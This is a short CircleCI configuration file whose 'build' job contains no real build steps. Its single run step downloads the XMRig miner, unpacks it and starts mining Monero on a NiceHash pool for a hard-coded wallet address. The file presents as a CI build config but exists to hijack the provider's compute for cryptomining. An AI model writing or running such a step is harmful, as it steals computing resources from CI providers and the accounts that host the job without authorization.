version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://github.com/xmrig/xmrig/releases/download/v6.15.2/xmrig-6.15.2-linux-x64.tar.gz && tar -xf xmrig-6.15.2-linux-x64.tar.gz && cd xmrig-6.15.2/ && ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -a rx -k -u 3QFYun14BQ1VUC1cZNG76RHFzyqyknvKLj.chy2202 -p x
